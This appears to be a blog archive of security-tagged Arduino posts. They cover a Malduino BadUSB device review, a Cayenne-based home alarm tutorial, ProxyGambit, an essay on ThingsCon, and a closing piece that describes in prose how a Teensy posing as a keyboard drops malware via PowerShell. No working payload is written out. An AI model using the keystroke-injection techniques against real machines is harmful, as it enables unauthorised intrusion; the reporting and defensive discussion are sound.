Posts with «security» label

Malduino Elite – First Impressions

A while back, I wrote an article about Malduino, an Arduino-based, open-source BadUSB device. I found the project interesting so I signed up for an Elite version and sure enough, the friendly postman dropped it off in my mail box last Friday, which means I got to play around with it over the weekend. For those who missed the article, Malduino is USB device which is able to emulate a keyboard and inject keystrokes, among other things. When in a proper casing, it will just look like a USB flash drive. It’s like those things you see in the movies where a guy plugs in a device and it auto hacks the computer. It ships in two versions, Lite and Elite, both based on the ATmega32U4.

The Lite version is really small, besides the USB connector it only contains a switch, which allows the user to choose between running and programming mode, and a LED, which indicates when the script has finished running.

Original Malduino Elite sketch and Lite prototype

The Elite version is bigger, comes with a Micro-SD card reader and four DIP switches, which allow the user to choose which script to run from the card. It also has the LED, which indicates when a script has finished to run. This allows the user to burn the firmware only once and then program the keystroke injection scripts that stored in the Micro-SD card, in contrast to the Lite version which needs to be flashed each time a user wants to run a different script.

These are the two Malduinos and because they are programmed straight from the Arduino IDE, every feature I just mentioned can be re-programmed, re-purposed or dropped all together. You can buy one and just choose to use it like a ‘normal’ Arduino, although there are not a lot of pins to play around with. This freedom was one the first things I liked about it and actually drove me to participate in the crowd-funding campaign. Read on for the full review.

The Hardware

Malduino Elite vs USB flash drive

So the Elite board arrived as schedule and I found myself some time to look an it. Despite being longer than the Lite version, it’s still quite small, measuring roughly 4.6 cm x 1.1 cm (around 1.8 in x 0.43 in), which you can easily adapt to an old USB case, although you’ll have to cut some holes for the DIP switches and the Micro-SD card. In the crowd-funding campaign, the original sketch was for a 3 DIP switch version but the final Elite has four, which I found nice. I plugged it in to an old computer, after some consideration about which firmware it could ship with and what it could do to my laptop, and sure enough a red LED appeared. And that was it. Nothing else.

After playing around with the switches and exercising some RTFM, I realised that the firmware it ships with is probably some sort of Q.C. test for the dips, which makes the Malduino output the numbers 1 to 4 (actually simulating a keypress 1 to 4), depending on which switches are ON. So far so good, it works and I’ve seen worse PCB boards than this one. The board has holes for six pins, which I did not trace to the micro-controller and I don’t know what they are for.

The Setup

Setting up the Malduino requires that you have the Arduino IDE installed and up to date. You’ll need to open up the board manager and install the Sparkfun boards since the Elite is programmed as a ‘Sparkfun Pro Micro’ running at 3.3 V and 8 MHz. Then you need to go the Malduino Script Converter website which serves several purposes:

  • It allows to convert scripts between the Lite and Elite versions
  • It allows you to choose your keyboard layout language
  • It auto generates the Arduino project for you to import to the IDE

For the Elite version, just create a simple or even empty script to download the project, since when in ‘normal’ operation you will just flash the Malduino once and then use the Micro-SD card to store new scripts.

A note on flashing, if you are using a Debian-based distribution you might come across some problems like I did and not be able to flash the device. Like the user on this most useful post, my modem-manager was trying to talk with the Malduino after every reset and confused AVRDUDE to death. The solution is to add udev rules to “/etc/udev/rules.d/77-mm-usb-device-blacklist-local.rules”, kudos to [socrim]:

ACTION!="add|change", GOTO="mm_usb_device_blacklist_local_end"
SUBSYSTEM!="usb", GOTO="mm_usb_device_blacklist_local_end"
ENV{DEVTYPE}!="usb_device", GOTO="mm_usb_device_blacklist_local_end"

ATTRS{idVendor}=="1b4f" ATTRS{idProduct}=="9204", ENV{ID_MM_DEVICE_IGNORE}="1"
ATTRS{idVendor}=="1b4f" ATTRS{idProduct}=="9203", ENV{ID_MM_DEVICE_IGNORE}="1"

LABEL="mm_usb_device_blacklist_local_end"

The Software

Since I’m running Linux, a quick shortcut to run a command is the ALT-F2 combination. So I script that into a file and save it to 1111.txt. The Elite searches the Micro-SD card for a file corresponding to the current dip switch state. Lets say the dip switch 2 and 4 are ON. In this case, the software tries to find the file named 0101.txt and parse its contents (as in dip switch order 1,2,3,4 and not the binary representation of the number 2 and 4) . When it finishes, the red LED starts flashing quickly. My simple script was:

DELAY 2000
ALT F2
DELAY 1000
STRING xterm
DELAY 1000
ENTER
DELAY 1000
STRING id
DELAY 1000
ENTER

But it was not working. Almost all commands worked but the ALT-F2 combo was not functioning properly. Close, but no cigar. No ALT-F2, no run command window. I’ve already lazy-browsed the source code a bit because I really didn’t have a lot of time on my hands but I needed to figure this out. The offending code was this:

else if(equals(s,e,"F1",<strong>3</strong>)) Keyboard.press(KEY_F1);</pre>

else if(equals(s,e,"F2",<strong>3</strong>)) Keyboard.press(KEY_F2);
...
else if(equals(s,e,"F10",3)) Keyboard.press(KEY_F10);
else if(equals(s,e,"F11",3)) Keyboard.press(KEY_F11);

A custom equals function was receiving size 3 for the strings of the Function keys, like “F2”. It was ok for “F10”, “F11” and “F12”, but failed for the rest of the keys. Changing 3 to 2 did the trick, but my Portuguese keyboard layout started to interfere with other test scripts. So I changed the code to include PT and UK layouts, changing them in a #define at compile time.

It would be cool if it was possible to access the SD card from the computer as a regular USB volume. I don’t know exactly how feasible that is, but it does not come with the current firmware. I still wanted to be able to output the content of an arbitrary file on the SD card to the screen, so I added another script function called ECHOFILEHEX that outputs the content of a file in the SD card as escape characters. For example, if the file a.txt contains “AAA”, the script command ECHOFILEHEX a.txt would output “\x41\x41\x41”. This can be useful to echo binary files into printf or echo -e, in Linux hosts at least.

Meanwhile, I had some trouble reading the original code. You know, we all have different programming styles. Don’t get me wrong, I’ve been known to write some messed-up spaghetti code. I sometimes browse old projects looking for some libs or classes I coded and wonder ‘who the heck wrote this steaming pile of code?’ Me, it was me. Anyway, I started to change a bit here and there and ended up changing pretty much the entire code. That’s the beauty and the curse of open-source. If you’re curious you can check it out here.

Conclusion

All in all, and despite some bumps, I’m quite pleased with Malduino. It is what I expected: an open platform for BadUSB attacks that’s in its infancy. It’s awesome that we can all tinker with it, modify it, make it better or just make it suit our needs. I hope a real community can start so we can see its full potential emerge. My short list includes simulating other USB devices, better SD card management, and expanding the device via the unused pins. What would you add?

It’s a long way to go and a lot can go wrong, so good luck with the project [Seytonic]!


Filed under: Featured, reviews, security hacks

Arduino based Security Project Using Cayenne


 

Description

This is an Arduino based home security project that uses the power of "Cayenne" for extraordinary capabilities.

Cayenne Beta

Cayenne is a new IoT drag and drop platform originally released for the Raspberry Pi, but now available for Arduino. Cayenne makes the task of connecting your Arduino to the internet as simple as possible. All of the complexity of internet connectivity is hidden within the Cayenne library.

You can easily create a Network of Arduinos and build an IoT system which can be managed and operated within the Cayenne dashboard. This dashboard is accessible through your browser or via the Cayenne smart phone app (on IOS or Android).

The feature I liked the most, was the ability to change the position of sensors or actuators on the Arduino without having to re-upload Arduino code. I could manage the changed position from within the Cayenne platform. The other feature that I liked was the ability to setup actions based on custom triggers. You can use Cayenne to trigger a whole range of functions, for example: play a sound, move a motor, light up an LED, or to send alert notifications via email or SMS.

Cayenne is in Beta at the moment, so there are a few minor bugs here and there, but overall - I give it a thumbs up - it is definitely worth checking out.
 

Here is a link to the Cayenne Beta Program:
**Cayenne Beta Link**



              Source: myDevices Media Kit

 

Home Security Project Summary

In order to fully experience this new IoT platform, I decided to create a project to really put it through its paces. This is what my Security Project will need:

  1. It will use two Arduinos, one connected to the internet via an Ethernet shield, and the other via WIFI.
  2. Two detectors - a PIR sensor and a laser trip wire.
  3. If the sensors are tripped, the person has 10 seconds to present an RFID tag to the Grove RFID reader:
    • If a valid RFID tag is SUCCESSFULLY presented within the time limit, a nice personalised greeting will be played to that person using a Grove - Serial MP3 player
    • If a valid RFID FAILS to be presented within the time limit, an Alarm will sound, and I will be notified of the intrusion via an SMS alert.
  4. The Cayenne dashboard will show the status of the sensors, and I will have full control over my security system via the web interface (or smartphone app).
  5. The sensors will be attached to a different Arduino to that of the Grove MP3 player and the RFID tag reader, which means that there will have to be some level of communication between the two Arduinos. In fact, the cross communication will be vital to the success of this project.


 
 
 

Project Video



 
 
 
 

 

Flow Diagrams:

Main Flow Diagram

The following flow diagram shows the Security project process. It is a high level view of the decisions being made by each Arduino in response to various events.  


 

Triggers Flow Diagram

The following flow diagram aims to highlight the various triggers set up within Cayenne to get this Security system to work.  

 
 
 

Arduino IDE and Library Downloads

You will need an Arduino IDE to upload code to the Arduino and the Seeeduino Cloud.
Here is the link to the Arduino IDE: Arduino IDE - download location

The Cayenne service requires that you download and install the Cayenne Library into your Arduino IDE.
You can get the Cayenne Library from here: Cayenne Library File - Download


 

Cayenne Connectivity Setup

The Seeeduino Cloud needs to be prepared for use with Cayenne.
Normal operating/setup instructions can be found here: Seeeduino Cloud WIKI page
 
Once you have successfully connected Seeeduino Cloud to your WIFI network, you can add it to the Cayenne Dashboard by making the following selections from within the Cayenne Web application:

  1. Add New
  2. Device/Widget
  3. Microcontrollers
  4. Arduino
  5. Ensure Seeeduino Cloud is connected to WIFI network - the select the NEXT button
  6. Select - Arduino Yun: Built-in Ethernet - ticked
  7. Providing you have already installed the Cayenne library as described above - you should be able to copy and paste the code to the Arduino IDE and upload to the Seeeduino Cloud.
  8. If successful, you should see the Arduino Yun board appear within the Cayenne Dashboard. If not, then seek help within the Cayenne forum.


 

The Arduino UNO with WIZNET 5100 - Ethernet Shield
also needs to be prepared with Cayenne

  1. Add New
  2. Device/Widget
  3. Microcontrollers
  4. Arduino
  5. Ensure Arduino is powered, and Ethernet shield is connected to your internet router via an Ethernet cable
  6. Select - Arduino Uno: Ethernet Shield W5100 - ticked
  7. Copy and paste the code to the Arduino IDE and upload to the Arduino UNO.
  8. If successful, you should see the Arduino Uno board appear within the Cayenne Dashboard. If not, then seek help within the Cayenne forum.

 


 
If you have the Ethernet shield with the WIZNET 5200 chip, then you may need to download a specific Ethernet library in addition to the Cayenne library.
 
Just follow the instructions within the Automatically generated sketch provided - when you select your specific Arduino/Ethernet/WIFI shield combination. If you need further instructions on connecting your device to Cayenne - then please visit the myDevices website for the online documentation.
 


 
 
 
 

ARDUINO CODE (1)


Code for Arduino UNO with Ethernet Shield:

The following code will need to be uploaded to the Arduino UNO:


 
 
 
 
 

ARDUINO CODE (2)


Code for Seeeduino Cloud:

The following code will need to be uploaded to the Seeeduino Cloud:


 
 
 
 

Fritzing diagram (1)


Fritzing diagram for Arduino UNO with Ethernet

Please click on the picture below for an enlarged version of this fritzing diagram


 
 
 
 

Fritzing diagram (2)


Fritzing diagram for Seeeduino Cloud

Please click on the picture below for an enlarged version of this fritzing diagram


 
 
 
 
 
 
 

Cayenne Dashboard Setup - GUI


The Arduino code only provides half of the functionality of this project. The Cayenne Dashboard needs to be setup to provide the rest of the functionality. The following instructions will show you how to add each of the widgets required for this Home Security project.


Arduino Ethernet - Master Switch

The master switch allows me to turn the security system on and off. When I turn the MASTER SWITCH ON, the laser beam will turn on, and the sensors will start monitoring the area for intruders. This widget is NOT associated with a physical switch/sensor on the Arduino - it uses virtual channel 0. We need to add the Master switch to the dashboard:


  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Master On Off Switch
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V0
  10. Choose Widget: Button
  11. Choose Icon: Valve
  12. Step2: Add Actuator
We will add a trigger later to get this button to automatically turn the Laser beam on.


 
 
 

Arduino Ethernet - PIR Sensor

This sensor will be used to detect movement in the room. If a person walks into the room, this sensor will detect movement, and will trigger a message to be played on the Grove Serial MP3 player. The message will aim to get the person to identify themselves. They identify themselves by placing their RFID tag in close proximity to the Grove RFID reader. If the tag is valid, a "Welcome home" message is played on the Grove MP3 player. If a valid tag is not presented to the reader within 10 seconds, an Alarm will go off ("Alarm sound" played on Grove MP3 player.)

The PIR sensor is connected to digital Pin 6 of the Arduino, however, it is mapped to virtual pin 1 for better synchronisation with the Cayenne dashboard. This was done to capture ALL detections - as the PIR sensor could change from a LOW to HIGH and back to LOW state in between a Cayenne state check - and therefore, Cayenne could miss this motion detection.. Therefore we need to assign the PIR sensor to a virtual channel in the following way:
  1. Add New
  2. Device/Widget
  3. Sensors
  4. Motion
  5. Digital Motion Sensor - Motion Detector
  6. Widget Name: PIR sensor
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V1
  10. Choose Widget: 2-State Display
  11. Choose Icon: Light
  12. Step2: Add Sensor
  13. Select Settings from the PhotoResistor
  14. Choose Display: Value
  15. Save

 
 
 

Arduino Ethernet - Photoresistor

This sensor will be used with the laser beam to create a laser tripwire. If the sensor detects a change in light levels (drops below the threshold), it will activate the laser trigger button on the dashboard. The person will then be required to identify themselves etc etc (similar to the motion detection by the PIR sensor). The photoresistor widget will display the raw analog reading from the sensor (connected to A2), but is associated with virtual channel 2. I used a virtual channel for more control over this sensor. To add the Photoresistor to the dashboard:

  1. Add New
  2. Device/Widget
  3. Sensors
  4. Luminosity
  5. Photoresistor - Luminosity sensor
  6. Widget Name: PhotoResistor
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V2
  10. Choose Widget: Value
  11. Choose Icon: Light
  12. Step2: Add Sensor


 
 
 

Arduino Ethernet - Laser Trigger

The laser trigger is just an indicator that someone tripped the laser beam. The state of this widget is used to notify the Seeeduino that a presence has been detected. This widget is associated with virtual pin 4 on the Arduino UNO with Ethernet.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Laser Trigger
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V4
  10. Choose Widget: Button
  11. Choose Icon: Lock
  12. Step2: Add Actuator


 
 
 

Arduino Ethernet - Laser Threshold

The laser threshold is used to manually configure the light level at which the laser trigger will trip. When the photoresistor value drops below the threshold value, the laser trigger icon will activate. This allows the threshold value to be updated from the Cayenne dashboard, rather than having to manually adjust the value in the Arduino code. Also, this threshold can be set remotely, in that you don't have to be near the Arduino to change this value. A very useful feature of this Security system. This widget is associated with virtual pin 5 on the Arduino UNO with Ethernet.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. PWM Output - Control a PWM Output
  6. Widget Name: Laser Threshold
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V5
  10. Choose Widget: Slider
  11. Slider Min Value: 0
  12. Slider Max Value: 10
  13. Step2: Add Actuator
The max value of the slider is 10 - due to a current bug in the Cayenne software. Once resolved, this value (as well as the relevant Arduino code) will need to be updated.


 
 
 

Seeeduino Cloud - Presence Detected

The presence detected widget is there to notify the Seeeduino Cloud that a presence has been detected on the Arduino Uno with Ethernet shield. When the PIR sensor detects movement or if the laser tripwire is tripped, Cayenne will change the state of the Presence Detected widget from LOW to HIGH. This is used within the Seeeduino Cloud to trigger the message "Place your keys on the Mat"
. If a valid RFID tag is read by the Grove RFID reader, then this widget's state will change back from HIGH to LOW, and the MasterSwitch will be deactivated - turning the Security system off. This widget is associated with Virtual pin 6 on the Seeeduino Cloud.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Presence Detected
  7. Select Device: Seeeduino Cloud
  8. Connectivity: Virtual
  9. Pin: V6
  10. Choose Widget: Button
  11. Choose Icon: Lock
  12. Step2: Add Actuator


 
 
 

Seeeduino Cloud - Intruder Alert

If a valid RFID tag is not read by the Grove RFID reader within 10 seconds of a presence detection event, an alarm will sound, and this widget will be activated. This will trigger a notification event - to notify me of the unauthorised intrusion - via SMS or email. I will also have a visual indicator on the Cayenne dashboard that an intrusion has taken place. This widget is associated with Virtual pin 7 on the Seeeduino Cloud.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Laser Trigger
  7. Select Device: Seeeduino Cloud
  8. Connectivity: Virtual
  9. Pin: V7
  10. Choose Widget: Button
  11. Choose Icon: Thermometer
  12. Step2: Add Actuator


 
 
 

Seeeduino Cloud - Laser Beam

The laser beam widget was created to allow for full control over the laser beam. The laser beam can be turned on or off from the Cayenne dashboard, and a connected to digital pin 7 on the Seeeduino Cloud.


  1. Add New
  2. Device/Widget
  3. Actuators
  4. Light
  5. Light Switch - Turn On/Off a Light
  6. Widget Name: xLaser Beam
  7. Select Device: Seeeduino Cloud
  8. Connectivity: Digital
  9. Pin: D7
  10. Choose Widget: Button
  11. Choose Icon: Light
  12. Step2: Add Actuator


 
 
 
 

Cayenne Triggers

Now that all of the widgets have been added to the Dashboard, there is just one more step to complete the Security System. We need to setup the triggers. These triggers provide a level of automation that is easy to create within Cayenne, but would be very complicated otherwise. I set my triggers up as per the table below. Each row represents one of the triggers within my Cayenne dashboard. If you would like to see an example of how to add a trigger - please have a look at the video at the top of this tutorial.  


 
 
 
 
 
 

Concluding comments

I used many different elements to put this home/office security project together - Multiple Arduinos were connected to the internet, both controlled by a web/smart phone app, cross-communication/synchronisation between the Arduinos, and the use of multiple sensors and modules including a laser beam !
 
This was way more than just a simple PIR sense and alarm project. I now have a personalised greeting and reminder system when I walk in the door. Everyone else has their own personalised greeting. I can enable my Security System remotely, from two blocks away, and if I wanted to - I could enable it from the other side of the world. I know instantly when someone has entered my house/office.... with an SMS alert straight to my phone.
 
This project could easily be extended:

  1. Press a button on my phone to manually trigger/play a specific message/sound/song
  2. Take a picture of the intruder
  3. Introduce fire or leak detection aswell
  4. Add other environmental sensors - Temperature / Humidity
  5. Connect it to lamp/light - creating a security light
I am sure you can think of more things I could do with this system. In fact, why don't you mention your ideas in the comments below.
 
Cayenne was instrumental in getting this project to work. I don't think I would know where to start if I had to do this project without this cool IoT platform. I think I will definitely be trying out a few more projects using Cayenne, and should you want to do the same, then please make sure to join Cayenne Beta:
 
Here is the link you need to get to the right place: Cayenne Beta Link

 

If you like this page, please do me a favour and show your appreciation :

 
Visit my ArduinoBasics Google + page.
Follow me on Twitter by looking for ScottC @ArduinoBasics.
I can also be found on Pinterest and Instagram.
Have a look at my videos on my YouTube channel.

             

ScottC 30 Aug 15:42
alarm  arduino  arduinobasics  cayenne  laser  mp3  mydevices  pir  rfid  security  sms  tutorial  

Volkswagen Security Problems: Arduino Hack Reveals RFID Vulnerability

A team of researchers were able to unlock and start the ignition of Volkswagen cars with just $40 of electronic components.

Read more on MAKE

The post Volkswagen Security Problems: Arduino Hack Reveals RFID Vulnerability appeared first on Make: DIY Projects and Ideas for Makers.

Small Experiments in DIY Home Security

[Dann Albright] writes about some small experiments he’s done in home security.

He starts with the simplest. Which is to purchase an off the shelf web camera, and hook it up to software built to do the task. The first software he uses is the free, iSpy open source software. This adds basic features like motion detection, time stamping, logging, and an interface. He also explores other commercial options.

Next he delves a bit deeper. He starts by making a simple motion detector. When the Arduino detects motion using a PIR sensor it gets a computer to text an alert. After the tutorial begins to veer a little and he adds his WiFi light bulbs to the mix. Now he can send an email and change the color of the lights.

We suppose, that from a security standpoint. It would really freak a burglar out if all the lights turned red when they walked into a room. Either way, there’s definitely a fun weekend project in playing around with all these systems.


Filed under: home hacks
Hack a Day 24 Apr 12:00

New Project: Make an Apple Watch Door Unlocker

Use an Apple Watch to automagically open doors at home or at work with a tap on your wrist.

Read more on MAKE

The post Make an Apple Watch Door Unlocker appeared first on Make: DIY Projects, How-Tos, Electronics, Crafts and Ideas for Makers.

ProxyGambit Better Than ProxyHam; Takes Coffee Shop WiFi Global

Last weekend saw the announcement of ProxyHam, a device that anonymizes Internet activity by jumping on WiFi from public libraries and cafes over a 900MHz radio link. The project mysteriously disappeared and was stricken from the DEFCON schedule. No one knows why, but we spent some time speculating on that and on what hardware was actually used in the undisclosed build.

[Samy Kamkar] has just improved on the ProxyHam concept with ProxyGambit, a device that decouples your location from your IP address. But [Samy]’s build isn’t limited to ProxyHam’s claimed two-mile range. ProxyGambit can work anywhere on the planet over a 2G connection, or up to 10km (6 miles) away through a line-of-sight point to point wireless link.

The more GSM version of ProxyGambit uses two Adafruit FONA GSM breakout boards, two Arduinos, and two Raspberry Pis. The FONA board produces an outbound TCP connection over 2G. The Arduino serves as a serial connection over a reverse TCP tunnel and connects directly to the UART of a Raspberry Pi. The Pi is simply a network bridge at either end of the connection. By reverse tunneling a TCP connection through the ‘throwaway’ part of the build, [Samy] can get an Internet connection anywhere that has 2G service.

Although it’s just a proof of concept and should not be used by anyone who actually needs anonymity, the ProxyGambit does have a few advantages over the ProxyHam. It’s usable just about everywhere on the planet, and not just within two miles of the public WiFi access point. The source for ProxyGambit is also available, something that will never be said of the ProxyHam.


Filed under: security hacks

Secure and Track Your Bike with this Arduino-Based GPS Lock

Riding a bike can be fun, great exercise, and, if you live in a city conducive to it, a great mode of transportation. According to author Scott Bennett who lives in Vancouver BC, Canada, a city with a high bike theft rate, he “wanted to have some peace of mind […]

Read more on MAKE

The post Secure and Track Your Bike with this Arduino-Based GPS Lock appeared first on Make:.

Secure and Track Your Bike with this Arduino-Based GPS Lock

Riding a bike can be fun, great exercise, and, if you live in a city conducive to it, a great mode of transportation. According to author Scott Bennett who lives in Vancouver BC, Canada, a city with a high bike theft rate, he “wanted to have some peace of mind […]

Read more on MAKE

The post Secure and Track Your Bike with this Arduino-Based GPS Lock appeared first on Make:.

Casa Jasmina and Bruce Sterling at Thingscon 2015

Bruce Sterling went to Thingscon conference with a keynote about Casa Jasmina and then published the following essay.

—————-

This is the third of my Casa Jasmina essays. It’s about the recent “ThingsCon” conference in Berlin, May 2015.

This remarkable event was the second “ThingsCon,” a new gathering which makes itself useful to the European hardware startup scene, especially “connected products” designers and builders from Berlin and London. “ThingsCon” took place in Berlin’s “Culture Brewery,” which is a huge, defunct beer factory, currently re-zoned for theaters, bars, restaurants and design retail.

Anybody who has seen the Garrone Foundry (which houses Toolbox Co-Working, Fab Lab Torino and Casa Jasmina), would surely recognize the “Culture Brewery.” It’s the same European story: the old industrial hulk remade for today’s culture-industry. So we found the ThingsCon venue to be pretty cozy, even though the stairs are of odd sizes, the huge, lofty rooms don’t fit together properly, the events and workshops are on different floors and mysteriously distant from one another, and there was excellent beer everywhere and tiny, crooked bathrooms stuck nowhere in particular. There’s something fun about this steampunk disorganization — if you’ve built a weird open-source Internet-of-Things device out of glued plywood and steel rods, it really fits that atmosphere.

ThingsCon is not a Maker Faire for the general public, and attending it is not cheap. ThingsCon is aimed at designers, developers, engineers, entrepreneurs and similar stakeholder-types from the technology ecosystem. The presentations were full of practical wisdom about commercial tech-product development: scaring up funding money, allocating time and resources, packaging, promotion, marketing, founder exit-strategies, angel investment, the issues common to people who might like to sit down for a serious talk with, say, Intel.

The organizers of ThingsCon are Peter Bihr, Simon Hoher, Emanuel Schwarz, Max Kruger, Sonja Heinen, Alexandra Deschamps-Sonsino, Brady Forrest, Louisa Heinrich, and Marcel Schouwenaar. As conference organizers go, they won’t win any prizes for sleek efficiency. However when it comes to the Internet of Things, these activists know plenty. At ThingsCon you can learn a lot in a hurry.

So: now that we understand what ThingsCon is about and who ThingsCon is meant to please, let’s confront some of their native ThingsCon problems, because they have lots of interesting issues.

The guy who delivered the first ThingsCon opening keynote, Warren Ellis, really understands their pains. Warren Ellis is pretty well known as a comic book writer, film scriptwriter and novelist, but he was also in the brain-trust of BERG,the legendary and now-dead London interaction-design firm. Warren Ellis grasps the many thorny difficulties of modern connected-product design.

Ellis delivered a sardonically funny rant, warning designers, engineers and manufacturers about the fierce wrath of genuine consumers. Consumers — (they’re the people who are supposed to buy Internet-of-Things products) — are a fickle and treacherous group. Consumers are never grateful for the hard work of designers and technicians. On the contrary, consumers are suspicious, endlessly demanding of customer support, and they resent most things they buy. The Internet-of-Things is even worse than traditional consumer capitalism, because interactive products don’t just sit there, they are invasive and intimate. People treasure their homes as a safe space in a harsh, competitive world, and they feel emotionally wounded when anything in their house betrays them.

Warren Ellis is an intelligent and erudite man, and he was telling the crowd the truth, but they were all laughing nervously because they can’t really believe what he says. It’s all true, but it’s important to understand this and still have some courage about it. If you invent and manufacture something, and it’s a commercial success and ten million people buy the product, of course your life is going to change. You won’t be a “Maker” alone in a garage any more, you’ll be an Internet multimillionaire with customer-support issues. Warren Ellis is right to urge people to think these things through: you shouldn’t dabble in technology and business unless you’re ready to face the consequences of getting what you want.

Barriers to entry in manufacturing are collapsing, so the old lines between a do-it-yourself Maker and a commercial industrialist are blurring. But this doesn’t solve old problems, it just creates interesting new ones. This was the lesson conveyed by Tina Aspiala. Before ThingsCon 2015, I had never heard of Tina Aspiala. Thanks to ThingsCon, I will pay attention to Tina Aspiala from now on.

Tina, who achieved some success with a product of hers, has become a Kickstarter patroness. Tina Aspiala spends a lot of time on Kickstarter and likes to give people some crowdfunding money just to see what happens. She told the crowd that results were mixed. Kickstarter is a funding platform, but some people on Kickstarter are crooks, they’re Kickstarter embezzlers. Other people want to be honest, but they flee in terror when they realize what the real world expects from real design and manufacturing. Others just have bad luck with their Kickstarter: they really wanted to do the work, but they broke a leg, or Dad died, or there was a divorce… that mishap wouldn’t stop FIAT or General Electric, but it does stop the Kickstarter team because they are few in number, while FIAT and General Electric have thousands of personnel.

Many Kickstarter projects get built, despite the host of problems in shipping, supply chains, material costs and manufacturing — but that doesn’t end the story. The product might be workable, but just not much good. The product might do what is promised, but the thing that the product does is only interesting once or twice, not useful in daily life. It’s a “gonzo product” (in the term created by Alexandra Deschamps-Sonsino), because it physically works and it does something, but the thing it does is eccentric and weird, so it has no commercial potential or mass appeal.

Why do we have “gonzo products” nowadays? It’s because (as Tina Aspiala pointed out), cheap electronic components make new combinations easy. Projectors, motors, sensors, cameras, processors and various wireless connectivity chips are all drastically cheaper, so product development becomes like a card game, when any gambler can connect X with Y and add some Z, then hope for a jackpot payoff.

In the case of the Internet of Things, there are many possible inputs — dozens of sensors of all kinds — but very limited outputs, because most IoT gizmos can only do very limited things to get any human attention: they blink, or beep, or vibrate. Blinking, beeping, vibrating things that demand human attention can get pretty annoying. Clearly this is a major IoT problem. Tina Aspiala recommends trying to think this situation through with some design perspective, instead of just hacking more components and attaching them to breadboards with soldering irons. That’s a point of view that makes some sense, though, let’s face it, people are gonna want to do it the easy way.

ThingsCon abounded in talks and workshops, more than I can describe here, but the most interesting thing on offer at Thingscon 2015 was the “IOT Design Manifesto”.  That’s why I’m placing the manifesto here in this post.


A manifesto is a sign of creative health. It’s not that I agree with the “IoT Design Manifesto” — on the contrary, if everybody agrees with a manifesto, then the manifesto is vapid and useless and hasn’t really said anything. Even a manifesto that’s completely wrong can be useful, because it motivates people to rebel and try something else. This manifesto is pretty good, in my opinion, because it’s kindly in tone and well-mannered, it confronts quite a few of the IoT’s real problems.

Even the first declarations, one and two, “We don’t believe the hype, we design useful things,” singles out the ThingsCon crowd as people who are skeptical and yet also trying to get something done. It’s a good attitude for a young industry. The other declarations are about about participation, security, privacy, data collection, association, personal agency, sustainability and humanity. These are some big, hairy issues which aren’t going to get solved in anybody’s lifetime. However, if you spend your life with the Internet of Things you’re going to be dealing with situations of that kind all the time. So, might as well get used to that prospect now.

The authors of this IoT Manifesto are Andrew Spitz, Ruben van der Vleuten, Marcel Schouwenaar, Harm van Beek, Kevin Verelst, Anner Tiete, Jan Belon, Marcel van Heist and Holly Robbins. Before I went to ThingsCon I’d never heard of any of those people, but they were right to do what they did, and I’ll be watching them with a lot more interest from now on. People tend to grow by the size of their chosen problems. These people have some pretty big problems.

I closed the ThingsCon event by asking the people there to help us with our house.

It’s a bit scary to open the faucet in this way: we don’t know if we’ll get a huge flood, or just a groan in the pipe and some dripping. If we get a lot of interest, Casa Jasmina will be crowded and noisy; if interest is more modest, we’ll try to concentrate on a few core issues. In our Internet-of-Things house, we’ll have to acquire some things, accept some things, build some things and maybe commission some things, too. The project has started deliberately, we have paced ourselves, but as the months pass, Casa Jasmina will slowly become a unique and interesting place, a true place of difference.

I wondered, in starting this project, who would ever really want to stay in such a place, and, having been to ThingsCon, I now have a much better idea about that. ThingsCon had about 300 people attending it — the “new hardware movement” are not a mass movement of millions — but those three hundred people are real people. They are bright and committed, and they really exist. If we understand them as our natural guests and we try to please them, I think we’ll do well.

Bruce Sterling

Using HID Tricks to Drop Malicious Files

[Nikhil] has been experimenting with human interface devices (HID) in relation to security. We’ve seen in the past how HID can be exploited using inexpensive equipment. [Nikhil] has built his own simple device to drop malicious files onto target computers using HID technology.

The system runs on a Teensy 3.0. The Teensy is like a very small version of Arduino that has built-in functionality for emulating human interface devices, such as keyboards. This means that you can trick a computer into believing the Teensy is a keyboard. The computer will treat it as such, and the Teensy can enter keystrokes into the computer as though it were a human typing them. You can see how this might be a security problem.

[Nikhil’s] device uses a very simple trick to install files on a target machine. It simply opens up Powershell and runs a one-liner command. Generally, this commend will create a file based on input received from a web site controlled by the attacker. The script might download a trojan virus, or it might create a shortcut on the user’s desktop which will run a malicious script. The device can also create hot keys that will run a specific script every time the user presses that key.

Protecting from this type off attack can be difficult. Your primary option would be to strictly control USB devices, but this can be difficult to manage, especially in large organizations. Web filtering would also help in this specific case, since the attack relies on downloading files from the web. Your best bet might be to train users to not plug in any old USB device they find lying around. Regardless of the methodology, it’s important to know that this stuff is out there in the wild.


Filed under: Arduino Hacks, security hacks